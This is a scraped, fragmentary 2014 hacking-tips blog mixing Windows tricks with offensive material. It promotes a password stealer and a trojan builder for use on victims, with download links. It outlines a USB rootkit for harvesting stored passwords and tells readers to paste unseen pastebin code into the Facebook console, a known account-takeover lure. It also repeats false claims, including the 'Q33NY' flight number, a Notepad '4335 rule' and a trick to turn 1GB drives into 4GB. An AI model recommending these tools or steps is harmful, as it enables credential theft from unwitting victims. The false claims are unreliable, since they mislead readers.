Your Info

Sign by Danasoft - Get Your Sign

Wednesday, 29 January 2014

Maya Password Stealer

What is Password Stealer?
A password stealer (PWS) is malware that is specifically used to transmit personal information, such as user names and passwords. A PWS often works in conjunction with a keylogger or other tracking software.


In this article, I have presented Maya Password Stealer which will help you to steal passwords from victims PC;






Features:
  • Email Logging
  • PHP Logging Support
  • Clearing Password at each Startup Option
  • Startup Key
  • File Renamer
  • Ras Password
  • Grab IE URLs
  • ActiveX Startup
  • Local Log Saving


Download link:-http://www.nuclearwintercrew.com/Products-View/18/Maya_Pws_v1.1/



How to Hire am Email id only for 10 minutes

STEP 1.

Firstly open 10minutemail.com
Now an email will be generated
which will be valid till 10
minute on your ip address.
You can reply and receive
emails here.

STEP 2.

Now use this trick to verify
your account and to
promotional bonus.
Now no danger of junk email in
your account.

Steps to Check Original Installation Date of Windows

Step 1: Hold Windows key and PressR key to open Run, Type CMD and hit enter to Open up CommandPrompt.

Step 2: Type systeminfo.exe in Command Prompt and Hit Enter.

Step 3: Just wait a Few Seconds toGather all the Data , Boom- You will Get all the info of your System injust a few seconds including the Original Installation Date which weare looking for.

Step 4: With this Command you intall the Necessary info about your System but If you Just want to knowthe date on which your windows was Installed on your System then type this Command system info | find /i“install date

Steps to Make nameless or Invisible Facebook Profile name

[its not nameless, actually its ﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞ symbol ID.. better than a Full name ID ]

1) First of all open Mozilla Firefox/UC Browser
2) Click on Tools >> Options >> Advanced >> Settings….
3) Now click on Manual proxy Configuration >> HTTP Proxy
4) Paste 119.252.160.34 or 118.98.35.251 in HTTP Proxy
5) Paste 8080 in Port.
6) Click OK and OK
7) Now open your Facebook account >> Account Setting
8) Scroll down and change the language from English (US) to Bahasa Indonesia
9) Change your name to RﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞﱞM you need to copy this code from here and paste it.
10) Now Remove the Letter R and M then enter your password and click to Save.

Trick to hack BIOS password

To perform this PC Trick you will need the following tool:
1). #1 or #2 Phillips-head screwdriver
2).T-15 TORX driver
3).1/4" hex nutdriver.
4).Needle-nosed pliers if you are working with jumpers
A small flashlight or headlamp
With tools at hand, perform the following steps for this computer trick:
1).Turn the PC off (this means a total shutdown, not merely standby or hibernate mode) and disconnect the AC power cord.
2).Remove the cover from your system (this step may require tools, undoing a thumbscrew, or flipping a latch or two).

Tuesday, 28 January 2014

How To Set Pattern Lock In Computer Like Android

Nowadays mostly Android supported devices are comes with pattern lock technology and it is one of the nice & latest way to unlock screen of mobile. But did you ever thought to try this pattern lock in your computer ? if not then after following this post, you will be able to set pattern lock in your computer just like Android devices. You can apply this pattern lock in Windows Operating System like Windows XP, 7 & 8.
Here we are just going to show you one small windows supported application of pattern lock which is very easy to use and secured too. You can set this pattern lock after main password screen of your computer also so that it will add extra layer of security in your computer.
Eusing Maze Lock ( http:// www.mediafire.co m/download/ 5wznxq613i5j27x/ EMLSetup.exe) is newly launched windows supported application which is very small in size but its work is totally secure because by using this pattern lock in your computer, you can add extra layer of security so that no one can guess and break your password.
Features :
*Automatically Lock on Startup.
*Wrong password will alert you with siren sound.
*You can set message as per your choice on Lock screen.
*You can set background image as per your choice.
Steps To Use :

What Is MD5 and How To Use It

In this post I will explain you about one of my favorite and interesting cryptographic algorithm calledMD5 (Message-Digest algorithm 5). This algorithm is mainly used to perform file integrity checks under most circumstances. Here I will not jump into the technical aspects of this algorithm, rather will tell you about how to make use of this algorithm in your daily life. Before I tell you about how to use MD5, I would like to share one of my recent experience which made me start using MD5 algorithm.

Recently I made some significant changes and updates to my website and as obvious I generated a complete backup of the site on my server. I downloaded this backup onto my PC and deleted theoriginal one on the server. But after a few days something went wrong and I wanted to restore the backup that I downloaded. When I tried to restore the backup I was shocked! The backup file that I used to restore was corrupted. That means, the backup file that I downloaded onto my PC wasn’t exactly the one that was on my server. The reason is that there occured some data loss during the download process. Yes, this data loss can happen often when a file is downloaded from the Internet. The file can be corrupted due to any of the following reasons.
  • Data loss during the download process, due to instability in the Internet connection/server
  • The file can be tampered due to virus infections or
  • Due to Hacker attacks

How to sniff Passwords using USB Drive

Anyone can steal stored passwords from any computer and that too by using your USB drive.
Can’t believe!
Read on..
As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit.
MessenPassRecovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Hide yourIP from A website

1) Go to that site you want to hide your IP from.

2) Go to the beginning of the URL and add
"unbanip.com" for example: UnbanIP.com/
facebook.com

3) Press "Hide Me".

4) Done, your IP is now changed. You can continue
surfing with your new IP

Monday, 27 January 2014

Bug In Windows Calculator

Hey Readers! this time Learn Hacking has brought a cool windows bug for you guys.
Its something everyone should know.
This is a Bug in Windows Calculator.
Note:- It works with all versions of Windows.
So without much discussion, let me proceed to the bug.
Have you ever used square root button in windows?
If yes, it is a possibility that you might have come across this bug…. If not, you are just about to know it..
Just follow the steps:-

Trick to Show Your name after time in taskbar...

try this  trick to add up ur name in place of AM and PM beside time
Its simple

Step-1:- Navigate to -> Start -> Control Pannel 
-> Regional and Language Option -> Click on Customize -> Go to TIME Tab -> Change AM symbol and PM symbol from AM and PM to ur name -> Apply -> Ok ...
Did It change? If not, follow step-2 below.

Step2:- Now go to time in taskbar and Double Click it to open "Date and time property" ...Look place where time changes in digital form i.e. 02:47:52 AM , click to arrow to cnage the AM or PM by selecting and press arrow. It will Show ur name or name that was entered by u, Apply -> OK and be HAPPY 8)

Welcome

In Notepad World

1. Bush Hid the Facts/This App Can Break

This is one of the most popular notepad tricks because of its mysterious nature. In order to get an idea as to what this trick does, just follow the steps given below:
  • Open Notepad.
  • Type “BUSH HID THE FACTS” or “this app can break” (without quotes).
  • Save that file with any name and close it.
  • Open It Again to see the magic.
Reason For This Behavior: It is known as the 4335 Rule. It means that if we enter four words separated by spaces, wherein the first word has 4 letters, the next two have three letters each, and the last word has five letters. Then Notepad Automatically hides the text into unknown code.

2. World Trade Center Attack Trick

As you might be knowing that the flight number of the plane that had hit World Trade Center on that dreadful day (9/11) was Q33NY. Now call this trick a coincidence  or something else but whatever it is, it does startle us.
  • Open Notepad.
  • Type “Q33N” (without quotes) in capital letters.
  • Increase the font size to 72.
  • Change the Font to Wingdings.
You will be amazed by the findings.

3. Make A Personal Log-Book or A Diary

Did you know that you can also use Notepad as a simple digital diary or a personal Log-Book ? Well, if you didn’t then follow the below mentioned steps to make one for yourself !
  • Open Notepad.
  • Type .LOG (in capital letters) and hit enter.
  • Save it with any name and close it.
  • Open it again.

Create A Undeletable And Unrenamable Folders In Windows

creating undeleteable files

How To Create Undeletable And Unrenamable Folders ?

  1. Go to Start and then Click on Run
  2. Type cmd & hit enter (To open Command Prompt ).
  3. Remember you cannot create Undeletable & unrenamable folder in your root directory (i.e. where the windows is installed) That means you can't make this kind of folder in C: drive if you installed windows on C:
  4. Type D: or E: and hit enter
  5. Type md con\ and hit enter (md - make directory)
  6. You may use other words such as aux, lpt1, lpt2, lpt3 up to lpt9 instead of con in above step.
  7. Open that directory, you will see the folder created of name con.
  8. Try to delete that folder or rename that folder windows will show the error message.
1. Open Notepad and Copy code given below into it.
cls
@ECHO OFF
title http://willhack.blogspot.in/
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== tjback goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder

How To Watch 18+ YouTube Videos Without Logging In ?

1. First get the Url of video you want to watch. As shown below.
http://www.youtube.com/watch?v=4Xkh6j7RMqk 
2. Then copy the Video Id. For above link video Id is 4Xkh6j7RMqk
3. Now paste the Video Id in the link given below.
http://www.youtube.com/v/VideoId?fs=1
  • Replace VideoId with the Id you copied in Step 2
4. Now the url will become as shown below.
http://www.youtube.com/v/4Xkh6j7RMqk?fs=1
5. Done.

Top 5 Cool Notepad Tricks

notepad tricks
I had previously share some Interesting computer tricks as well as cool Batch fileprograms. In this post i will share with you guys some of the cool notepad tricks.As name suggest you don't require any program other then notepad. So lets get started.

1. World Trade Center Attack Trick

world trade center trick


The flight number of the plane that had hit World Trade Center on  (9/11) was Q33NY. Now we call this trick or a coincidence or something else but whatever it is you will be definately amazed by the this trick.

    1. Open Notepad and Type “Q33N” (without quotes) in capital letters.
    2. Increase the font size to 72.
    3. Change the Font to Wingdings.

2. Matrix Effect Trick

matrix effect trick
In this trick i will show you to make a batch file in notepad which will act as matrix effect that you might have seen in movies.Matrix effect is basically number flashes in green color.

How To Open Banned Site ?

1. Open www.incloak.com in your browser.
You can also use any proxy site from list below

2. After that enter the URL of the site which you want to open like below.
Open Banned Websites WIth Proxy Sites
3. Now click the Hide Me button and enjoy.

The best hacking tools collection

Here, i have collect some best hacking tools for you. That are listed below: 

Nessus
The “Nessus” Project aims to provide to the internet community a free, powerful, up-to-date and easy to use remote security scanner for Linux, BSD, Solaris, and other flavors of Unix.

Ethereal
Ethereal is a free network protocol analyzer for Unix and Windows. Ethereal has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session.



Snort
Snort is an open source network intrusion detection system, capable of performing real-time traffic analysis and packet logging on IP networks.

TOP FIVE HACKER TOOLS EVERY CISO SHOULD UNDERSTAND

As the role of the CISO continues to evolve within organizations towards that of an executive level position, we see a growing emphasis on traditional business administration skills over the more technical skills that previously defined the top security leadership job.
Nonetheless, CISOs need to keep abreast of the latest down-in-the-weeds tools and technologies that can benefit their organization’s security posture, as well as those tools that are widely available which could be misused by malicious actors to identify and exploit network security weaknesses.
In light of that fact, we recently spoke to Nabil Ouchn (@toolswatch), the organizer of the Arsenal Tools exhibit and activities at the BlackHat Conferences in both the US and Europe since 2011, as well as being the founder of the portal ToolsWatch.org.

10+ Excellent Open Source Web Based File Explorer Applications to Manage and Share Files





With the increase in the use of applications over the internet, a system to conveniently manage the data is inevitable. As a solution, web based file managers can be used to manage the files and folders with ease through a web browser such as Internet Explorer, Firefox, Chrome, Safari etc. Additionally documents can also be shared with other users. Online Edit of the Text/Word/Excel files is also possible. Some web servers are stand-alone while a few require installation of software like IIS/Apache/MySQL/ASP/PHP/. Net.

Below is a lowdown on the top open source web-based file explorers:

  1. eXtplorer
  2. eXtplorer is used for browsing directories or files on the server. The basic functionalities like to edit, move, copy, delete, search, upload and download files are available. Creating and extracting archives, new files and directories can also be done. Additionally, eXtplorer can be used to login and work through FTP. WebDAV access is also possible. This product has a dual-license. The user can opt to use under either Mozilla Public License (MPL 1.1) or GNU. The minimum requirement to run eXptlorer is PHP 4.3 on the server and an update of Javascript on the browser. 

    Key Feature: Access Files through FTP 

  3. AjaXplorer
  4. AjaXplorer has a quick accessibility like a website. The program is supported by all major web browsers. AjaXplorer can easily adapt to small screen devices. iOS application enables a comfortable usage experience on iPhone and iPad (Android coming). A Web-server with PHP 5.1 or later is sufficient to run AjaXplorer. 

    Key Feature: Preview and playing of multimedia files directly online is possible. Direct streaming of video formats from the server is possible. Online documents and images can be edited online when linked with external web services such as Zoho, pixlr. 

Sunday, 26 January 2014

Web Proxy Trojan Creator

This tools helps you make a Trojan end web proxy server which is used to hack victim;



Features:
  • Listensing Ports
  • IP Address Detection
  • Install Path
  • File Renamer
  • Host Setting
  • Email Logging
  • Log Time Interval
  • Assembly Changer


Download Here:-http://hulkload.com/ggltpoo4xx5z

Friday, 24 January 2014

New HD Facebook Theme With Auto Followers

Step 1:- -- http://pastebin.com/raw.php?i=ehnU87zH --
( Go To The Link & Copy All The Code, For copying Press ((Ctrl+A)) & Press ((Ctrl+C))
Step 2:- -- www.facebook.com --
( Come Back To FACEBOOk )
Step 3:- -- Inspect Element --
(( Google Chrome Users )) Press (( F12 ))
(( Firefox Users )) Press (( Ctrl+Shift+k ))
(( Manaul )) Right Click & Select (( Inspect Element )) & Click On (( Console ))
Step 4:- -- Pasting Code --
( Press (( Ctrl+V)) & Press (( ENTER ))
If you done all steps correctly so now your facebook theme have been changed

HOW TO CONVERT 1GB OR 2GB MEMORY CARD/PEN DRIVE TO 4GB

Hello guys, today I am posting a very simple yet interesting trick. Do you ever want to increase Total Size of your Memory Card or Pendrive. So now i am going to teach you - how toConvert 1gb or 2gb Memory card/Pendrive to 4gb and the important thing is that you can easily do it at home in jusy 2 minutes. You might thinking, I got crazy, but my friends, I am really fine and very happy to share this trick with you all. Got Excited!!! So without wasting much time let's start the process to convert 2gb memory card/pen drive to 4gb.

Firstly make a Backup of your memory card or pen drive before you apply this trick, as your memory card will be formatted in this trick.

Things you will need :- 

  • A PC
  • DriveIncreaser.bat (Software)

How To Convert Text to Speech And Text to MP3 Offline


There are many application for converting your text into Speech or Audio file like Mp3,Wav, Mp4 etc.
So If you want to convert your text to speech or audio then use any of the application according to your choice..You can also convert text to speech online. 
With the help you can convert your text to audio and use it to any where like you computer, mobile phones etc.
If you are interested to doing study then it is very good for you. with the help of this application you can convert all the ebooks  text into audio and save it your computer and play that audio file in your medial player....

Panopreter Plus

Panopreter Plus reads any text aloud and reads files in formats of txt, rtf, doc, pdf and web pages. It also converts the text into wav and mp3 audio files, so you can later listen to the vocal speech with a portable mp3 player device. Furthermore, it reads text copied to clipboard from any other software window. It supports many languages and voices.



Balabolka

Balabolka is a Text-To-Speech (TTS) program. All computer voices installed on your system are available to Balabolka. The on-screen text can be saved as a WAV, MP3, MP4, OGG or WMA file. The program can read the clipboard content, view the text from AZW, AZW3, CHM, DjVu, DOC, EPUB, FB2, HTML, LIT, MOBI, ODT, PRC, PDF and RTF files, customize font and background colour, control reading from the system tray or by the global hotkeys.

MAKE WINDOWS GREET YOU WITH A CUSTOM VOICE MESSAGE AT STARTUP

To use this trick, follow the instructions given below:-

1. Click on Start. Navigate to All Programs, Accessories and Notepad.


2. Copy and paste the exact code given below.
Dim speaks, speech
speaks=”Welcome to your
PC, Username”
Set speech=CreateObject
(“sapi.spvoice”)
speech.Speak speaks


3. Replace Username with your own name .


4. Click on File Menu, Save
As, select All Types in Save as
Type option, and save the file as
Welcome.vbs or “*.vbs”.